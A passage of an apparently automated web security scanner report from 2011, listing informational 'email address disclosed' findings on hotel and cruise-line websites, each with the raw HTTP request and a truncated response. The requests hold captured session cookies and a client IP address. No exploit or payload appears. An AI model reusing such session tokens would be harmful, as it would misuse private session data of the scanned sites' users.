on(){m.prm&&m.prm()},Va=function(a){t("m",function(){m.spn(a)})},Wa=function(a){t("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};p.prf=Xa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
20.47. http://www.grandcafe-sf.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grandcafe-sf.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.grandcafe-sf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 13266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<a href="mailto:party@grandcafe-sf.com">party@grandcafe-sf.com</a>
...[SNIP]...
20.48. http://www.hilton.com/en/hi/info/site_usage.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/info/site_usage.jhtml

Issue detail

The following email address was disclosed in the response:

Request

GET /en/hi/info/site_usage.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635909366:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 67255
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:15 GMT
Connection: close

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
<a href="mailto:CopyrightClaim@hilton.com">CopyrightClaim@hilton.com</a>
...[SNIP]...
20.49. http://www.kimptonhotels.com/_js/colorbox/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /_js/colorbox/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_js/colorbox/jquery.colorbox.js HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.kimptonhotels.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns

Response

HTTP/1.1 200 OK
Content-Length: 24493
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Aug 2011 15:22:14 GMT
Accept-Ranges: bytes
ETag: "01754c43a63cc1:9f01"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:52:35 GMT

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for
...[SNIP]...
20.50. http://www.kimptonhotels.com/intouch/KIT_overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /intouch/KIT_overview.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /intouch/KIT_overview.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635605933:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.2.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75799


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton InTouch Guest Rewards and Loyalty Program</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<a href="mailto:guestloyalty@kimptongroup.com" title="guestloyalty@kimptongroup.com" OnMouseDown="dcsMultiTrack('DCS.dcsuri','mailto:guestloyalty@kimptongroup.com','WT.ti','guestloyalty@kimptongroup.com','WT.z_Areacontentname','guestloyalty@kimptongroup.com','WT.z_Areacontentclick','1');"><strong>guestloyalty@kimptongroup.com</strong>
...[SNIP]...
20.51. http://www.marriott.com/miJSPath/N1206847948/bundles/sitecatalystlib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /miJSPath/N1206847948/bundles/sitecatalystlib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /miJSPath/N1206847948/bundles/sitecatalystlib.js HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_SITE=prod3; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/javascript; charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 70694
Cache-Control: public, max-age=931413, post-check=931413, pre-check=315360000
Expires: Fri, 14 Oct 2011 07:38:44 GMT
Date: Mon, 03 Oct 2011 12:55:11 GMT
Connection: close


var omnitureStandard=function(){var URL=window.location.href;return{getOmniStandardValues:function(){var splitEvars=$("#omniEvars").val().split(",");var splitProps=$("#omniProps").val().split(",");$.
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...
20.52. http://www.marriott.com/miJSPath/N603101329/bundles/milib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /miJSPath/N603101329/bundles/milib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /miJSPath/N603101329/bundles/milib.js HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_SITE=prod3; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/javascript; charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 440402
Cache-Control: public, max-age=931450, post-check=931450, pre-check=315360000
Expires: Fri, 14 Oct 2011 07:39:21 GMT
Date: Mon, 03 Oct 2011 12:55:11 GMT
Connection: close

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
20.53. http://www.marriott.com/tools/search/marriott-city-search.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /tools/search/marriott-city-search.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /tools/search/marriott-city-search.xml?log=1 HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_pers=%20s_lv%3D1317646536434%7C1412254536434%3B%20s_lv_s%3DFirst%2520Visit%7C1317648336434%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; fsr.a=1317646541286; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"}}; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 06:47:41 GMT
ETag: "2824c-66c-455dbd40"
Accept-Ranges: bytes
Content-Length: 1644
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Vary: Accept-Encoding
Cache-Control: max-age=6886
Expires: Mon, 03 Oct 2011 14:50:42 GMT
Date: Mon, 03 Oct 2011 12:55:56 GMT
Connection: close

<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"
xmlns:moz="http://www.mozilla.org/2006/browser/search/">
   <ShortName>Marriott Hotel Search by City/Airport
...[SNIP]...
<Contact>internet.customer.care@marriott.com</Contact>
...[SNIP]...
20.54. https://www.marriott.com/miJSPath/N1206847948/bundles/sitecatalystlib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /miJSPath/N1206847948/bundles/sitecatalystlib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /miJSPath/N1206847948/bundles/sitecatalystlib.js HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/javascript; charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 70694
Cache-Control: public, max-age=931520, post-check=931520, pre-check=315360000
Expires: Fri, 14 Oct 2011 07:41:26 GMT
Date: Mon, 03 Oct 2011 12:56:06 GMT
Connection: keep-alive


var omnitureStandard=function(){var URL=window.location.href;return{getOmniStandardValues:function(){var splitEvars=$("#omniEvars").val().split(",");var splitProps=$("#omniProps").val().split(",");$.
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...
20.55. https://www.marriott.com/miJSPath/N603101329/bundles/milib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /miJSPath/N603101329/bundles/milib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /miJSPath/N603101329/bundles/milib.js HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/javascript; charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 440402
Cache-Control: max-age=931320
Expires: Fri, 14 Oct 2011 07:38:05 GMT
Date: Mon, 03 Oct 2011 12:56:05 GMT
Connection: keep-alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
20.56. http://www.ncl.com/nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncl.com
Path:   /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:07:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 488086
Cache-Control: max-age=174409
Expires: Wed, 05 Oct 2011 13:15:13 GMT
Date: Mon, 03 Oct 2011 12:48:24 GMT
Connection: close


//web/script/min/yui-functional-0.4.0-min.js

YAHOO.lang.augmentObject(YAHOO.namespace("YAHOO.util.Functional"),{each:function(j,g,f){var b=0;try{if(j.forEach){j.forEach(g,f)}else{if(j.length){for(va
...[SNIP]...
<dav.glass@yahoo.com>
...[SNIP]...
20.57. http://www.ncl.com/nclweb/script/min/effects-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncl.com
Path:   /nclweb/script/min/effects-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nclweb/script/min/effects-min.js HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:15:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: application/x-javascript
Content-Length: 30501
Date: Mon, 03 Oct 2011 12:48:24 GMT
Connection: close

/*
* Copyright (c) 2007, Dav Glass <dav.glass@yahoo.com>.
* Code licensed under the BSD License:
* http://blog.davglass.com/license.txt
* All rights reserved.
*/
YAHOO.widget.Effects=function(){return
...[SNIP]...
20.58. https://www.ncl.com/nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:07:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 488086
Expires: Wed, 05 Oct 2011 13:12:07 GMT
Date: Mon, 03 Oct 2011 12:51:29 GMT
